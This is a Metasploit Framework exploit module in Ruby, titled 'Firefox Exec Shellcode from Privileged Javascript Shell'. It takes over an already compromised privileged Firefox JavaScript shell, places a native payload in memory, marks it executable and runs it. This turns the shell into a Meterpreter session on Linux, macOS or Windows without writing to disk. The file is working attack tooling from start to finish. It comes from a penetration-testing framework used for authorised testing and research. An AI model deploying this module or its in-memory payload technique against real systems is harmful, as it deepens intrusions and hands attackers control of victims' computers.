rapid7/metasploit-framework

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking # Missing autodetection, but has widespread targetability

  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Firefox Exec Shellcode from Privileged Javascript Shell',
      'Description'   => %q{
        This module allows execution of native payloads from a privileged Firefox Javascript shell.
        It places the specified payload into memory, adds the necessary protection flags,
        and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter
        session without touching the disk.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'joev' ],
      'Platform'      => [ 'firefox' ],
      'DisclosureDate' => '2014-03-10',
      'Targets'       => [
        [
          'Native Payload', {
            'Platform' => %w{ linux osx win unix },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0
    ))

    register_options([
      OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
    ])
  end

  def exploit
    print_status "Running the Javascript shell..."
    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
    print_warning(results) if results.present?
  end

  def js_payload
    %Q|
      (function(send){
        try {
          #{run_payload}
          send("Payload executed.");
        } catch (e) {
          send(e);
        }
      })(send);
    |.strip
  end
end